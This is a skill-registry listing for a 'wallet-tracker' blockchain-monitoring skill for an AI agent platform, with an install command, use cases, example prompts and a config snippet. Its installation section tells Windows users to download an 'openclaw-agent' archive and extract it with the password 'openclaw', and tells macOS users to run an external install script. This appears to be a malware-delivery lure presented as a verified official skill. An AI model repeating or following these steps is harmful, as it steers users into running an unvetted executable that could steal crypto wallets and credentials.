ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Monitor Ethereum and Solana addresses in real-time. Track whale transactions, portfolio shifts, and DeFi activity with the OpenClaw Wallet Tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-ue8hv
Or

What This Skill Does

The wallet-tracker skill is a robust monitoring solution for OpenClaw users, designed to provide real-time blockchain insights. By leveraging the openclaw-agent utility, this skill allows users to monitor Ethereum, Solana, and other blockchain addresses for significant activities. It acts as a bridge between raw chain data and actionable intelligence, enabling you to track whale movements, monitor portfolio fluctuations, and detect token or NFT transfers as they happen.

Installation

To install this skill, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-ue8hv.

IMPORTANT: Installation is not complete without the openclaw-agent. For Windows users, download the latest openclaw-agent and use the password 'openclaw' to extract. For macOS users, execute the provided installation script found at the installation documentation. Failure to configure this agent will result in an inability to pull blockchain data.

Use Cases

This skill is indispensable for crypto traders, researchers, and developers. Use cases include:

  • Whale Alerting: Configure the agent to notify you when large transactions move from known exchange wallets or smart contracts.
  • Portfolio Monitoring: Maintain a real-time dashboard of asset allocation changes for specific addresses.
  • DeFi Analysis: Keep track of interactions with decentralized finance protocols to detect liquidity events or yield farming shifts.
  • NFT Tracking: Monitor specific wallets or collections for unique digital asset movements.

Example Prompts

  1. "Check the last 10 transactions for address 0x71C7656... and identify any ETH transfers exceeding 50 units."
  2. "Monitor the Solana address [ADDRESS] for balance changes and alert me when the total SOL moves more than 5%."
  3. "Summarize the recent token transfers for this wallet and tell me which ERC-20 assets are currently moving the most volume."

Tips & Limitations

  • Rate Limiting: Etherscan and Solana RPC nodes have strict rate limits. Ensure your API keys are configured correctly to avoid service interruptions.
  • Agent Dependency: Always ensure the openclaw-agent is running in the background before initiating tracking tasks, as it manages the local connections required for monitoring.
  • Security: Never expose your API keys or private keys in any scripts. Use environment variables to handle sensitive credentials securely.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-ue8hv": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#defi#monitoring#finance
Safety Score: 3/5

Flags: network-access, external-api, code-execution